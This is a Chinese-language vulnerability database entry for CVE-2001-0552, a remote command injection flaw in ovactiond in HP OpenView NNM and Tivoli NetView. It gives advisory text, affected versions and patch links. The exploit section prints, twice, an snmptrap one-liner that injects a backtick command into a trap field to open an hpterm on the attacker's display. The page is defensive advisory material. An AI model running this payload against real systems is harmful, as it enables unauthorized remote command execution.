CVE-2001-0552
CVSS10.0
发布时间 :2001-09-20 00:00:00
修订时间 :2016-10-17 22:11:30
NMCOES    

[原文]ovactiond in HP OpenView Network Node Manager (NNM) 6.1 and Tivoli Netview 5.x and 6.x allows remote attackers to execute arbitrary commands via shell metacharacters in a certain SNMP trap message.


[CNNVD]OpenView NNM OVActionD远程命令执行漏洞(CNNVD-200109-108)

        
        ovactiond是Hewlett-Packard公司(HP)的OpenView和IBM下属Tivoli公司的NetView产品的一个组件。这些产品是用来管理大型系统和网络的。但是ovactiond中存在一个严重的安全漏洞,可以被入侵者用来提升权限,执行任意命令。结果可导致入侵者获得受影响计算机的管理员权限。
        ovactiond是OpenView和NetView的SNMP trap和事件处理器。ovactiond中存在一个安全漏洞,入侵者能利用它向管理服务器发送恶意信息,执行任意命令。这些命令会以ovactiond进程的权限运行,而该进程的权限因操作各系统而不同。
        问题出在trapd.conf 中的下列定义中:
        #
        EVENT
        OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.6000
        0208 "Configuration Alarms" Warning
        FORMAT Generic NNM to MgX message. $12
        EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1
        $10 1.3.[snip...]
        #
        用户提供的数据会被交给EXEC去执行。
        
        缺省配置的OpenView version 6.1受本漏洞影响。6.1之前的版本缺省配置下不受本漏洞影响,但也有一些报告称6.1之前的版本在用户自定义了trapd.conf文件后也有可能受本漏洞影响。
        缺省配置的Tivoli NetView versions 5.x和6.x不受本漏洞影响。但是自定义设置可能受本漏洞影响。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:ibm:tivoli_netview:6.0Tivoli NetView 6.0
cpe:/a:ibm:tivoli_netview:5.0Tivoli NetView 5.0
cpe:/a:hp:openview_network_node_manager:6.1HP OpenView Network Node Manager 6.1
cpe:/a:hp:openview_network_node_manager:5.01HP OpenView Network Node Manager 5.01

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0552
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0552
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200109-108
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=99201278704545&w=2
(UNKNOWN)  BUGTRAQ  20010608 HP Openview NNM6.1 ovactiond bin exploit
http://www.cert.org/advisories/CA-2001-24.html
(VENDOR_ADVISORY)  CERT  CA-2001-24
http://www.kb.cert.org/vuls/id/952171
(VENDOR_ADVISORY)  CERT-VN  VU#952171
http://www.securityfocus.com/bid/2845
(VENDOR_ADVISORY)  BID  2845

- 漏洞信息

OpenView NNM OVActionD远程命令执行漏洞
危急 输入验证
2001-09-20 00:00:00 2005-10-20 00:00:00
远程  
        
        ovactiond是Hewlett-Packard公司(HP)的OpenView和IBM下属Tivoli公司的NetView产品的一个组件。这些产品是用来管理大型系统和网络的。但是ovactiond中存在一个严重的安全漏洞,可以被入侵者用来提升权限,执行任意命令。结果可导致入侵者获得受影响计算机的管理员权限。
        ovactiond是OpenView和NetView的SNMP trap和事件处理器。ovactiond中存在一个安全漏洞,入侵者能利用它向管理服务器发送恶意信息,执行任意命令。这些命令会以ovactiond进程的权限运行,而该进程的权限因操作各系统而不同。
        问题出在trapd.conf 中的下列定义中:
        #
        EVENT
        OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.6000
        0208 "Configuration Alarms" Warning
        FORMAT Generic NNM to MgX message. $12
        EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1
        $10 1.3.[snip...]
        #
        用户提供的数据会被交给EXEC去执行。
        
        缺省配置的OpenView version 6.1受本漏洞影响。6.1之前的版本缺省配置下不受本漏洞影响,但也有一些报告称6.1之前的版本在用户自定义了trapd.conf文件后也有可能受本漏洞影响。
        缺省配置的Tivoli NetView versions 5.x和6.x不受本漏洞影响。但是自定义设置可能受本漏洞影响。
        

- 公告与补丁

        厂商补丁:
        HP
        --
        HP已经为此发布了一个安全公告(HPSBUX0106-154)以及相应补丁:
        HPSBUX0106-154:ec. Vulnerability in OpenView NNM
        HP OpenView Network Node Manager 6.2不受影响,6.1及以下版本补丁下载地址如下:
        HP OpenView Network Node Manager 5.0 1:
        HP OpenView Network Node Manager 6.1:
         HP Patch HP-UX 10.20 PHSS_24442
        
        http://ovweb.external.hp.com/cpe/patches/

         HP Patch HP-UX 11.00 PHSS_24443
        
        http://ovweb.external.hp.com/cpe/patches/

         HP Patch Solaris 2.x PSOV_02956
        
        http://ovweb.external.hp.com/cpe/patches/

         HP Patch WinNT4.X/2000 NNM_00743
        
        http://ovweb.external.hp.com/cpe/patches/

        IBM
        ---
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        IBM Tivoli NetView 5.0:
         IBM Patch Tivoli ovactiond update
        
        http://www.tivoli.com/support/

        IBM Tivoli NetView 5.1:
         IBM Patch Tivoli ovactiond update
        
        http://www.tivoli.com/support/

        IBM Tivoli NetView 6.0:
         IBM Patch Tivoli ovactiond update
        
        http://www.tivoli.com/support/

- 漏洞信息 (20909)

IBM Tivoli NetView 5/6 OVActionD SNMPNotify Command Execution Vulnerability (EDBID:20909)
multiple remote
2001-06-08 Verified
0 Milo van der Zee
N/A [点击下载]
source: http://www.securityfocus.com/bid/2845/info

ovactiond is part of the system management software packages OpenView and Netview, distributed by HP and IBM. It is designed for use on enterprise systems, and offers remote administrative facilities.

A problem with the software makes it possible for a remote user to execute commands on a managed system with the privileges of the ovactiond process (often 'bin' on Unix systems). The default configuration of the daemon as installed with HP OpenView enables the execution of commands upon receiving a trap with the command encapsulated in quotes and escapes. Tivoli Netview is not vulnerable to this by default, but may be if customized.

snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s "" 		

- 漏洞信息

11341
HP OpenView NNM/Tivoli NetView ovactiond Arbitrary Command Execution
Remote / Network Access
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-06-08 Unknow
2001-06-08 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

OVActionD SNMPNotify Command Execution Vulnerability
Input Validation Error 2845
Yes No
2001-06-08 12:00:00 2009-07-11 06:56:00
This vulnerability was announced to Bugtraq by Milo van der Zee <milo.van.der.zee@ordina.nl> on June 8, 2001.

- 受影响的程序版本

IBM Tivoli NetView 6.0
- Compaq Tru64 5.1
- Compaq Tru64 5.0 f
- Compaq Tru64 5.0 a
- Compaq Tru64 5.0
- Compaq Tru64 4.0 g
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 5.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Sun Solaris 2.5.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
IBM Tivoli NetView 5.1
IBM Tivoli NetView 5.0
HP OpenView Network Node Manager 6.10
- HP HP-UX 11.0
- HP HP-UX 10.20
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
HP OpenView Network Node Manager 5.0 1
- HP HP-UX 11.0
- HP HP-UX 10.20
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
HP OpenView Network Node Manager 6.2

- 不受影响的程序版本

HP OpenView Network Node Manager 6.2

- 漏洞讨论

ovactiond is part of the system management software packages OpenView and Netview, distributed by HP and IBM. It is designed for use on enterprise systems, and offers remote administrative facilities.

A problem with the software makes it possible for a remote user to execute commands on a managed system with the privileges of the ovactiond process (often 'bin' on Unix systems). The default configuration of the daemon as installed with HP OpenView enables the execution of commands upon receiving a trap with the command encapsulated in quotes and escapes. Tivoli Netview is not vulnerable to this by default, but may be if customized.

- 漏洞利用

snmptrap -v 1 &lt;NNM host&gt; .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display &lt;your client display&gt;\`" 4 s "" [snip...] 12 s ""

- 解决方案

Version 6.2 is not vulnerable.

HP has stated that versions prior to 6.1 are not vulnerable by default. It is possible that they may be vulnerable with a custom configuration. Administrators using versions older than 6.1 are advised to upgrade to 6.2.

Patches available for version 6.1:


IBM Tivoli NetView 5.0

IBM Tivoli NetView 5.1

IBM Tivoli NetView 6.0

HP OpenView Network Node Manager 6.10

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站